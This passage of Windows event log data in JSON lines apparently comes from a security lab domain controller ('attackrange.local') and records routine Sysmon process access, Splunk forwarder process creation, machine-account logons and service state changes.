{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6257,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6258,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6259,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2169-5F25-0000-0010328B0900}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2169-5F25-0000-0010328B0900}","TargetProcessId":"2456","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6260,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:09.163\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nTargetProcessId: 1216\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:09.163","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","TargetProcessId":"1216","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76868,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Windows Insider Service service entered the stopped state.","param1":"Windows Insider Service","param2":"stopped","EventReceivedTime":"2020-08-01 08:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76869,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the stopped state.","param1":"Update Orchestrator Service for Windows Update","param2":"stopped","EventReceivedTime":"2020-08-01 08:02:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220682,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x996E6\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x996e6","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220683,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x996E6\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50215\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x996e6","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50215","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220684,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x996E6\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x996e6","LogonType":"3","EventReceivedTime":"2020-08-01 08:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6261,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.696\r\nProcessGuid: {41C8662E-21A0-5F25-0000-0010C5970900}\r\nProcessId: 4368\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.696","ProcessGuid":"{41C8662E-21A0-5F25-0000-0010C5970900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6262,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21A0-5F25-0000-0010C5970900}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21A0-5F25-0000-0010C5970900}","TargetProcessId":"4368","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6263,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:40.695\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21A0-5F25-0000-0010C5970900}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:40.695","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21A0-5F25-0000-0010C5970900}","TargetProcessId":"4368","TargetImage":"C:\\Program 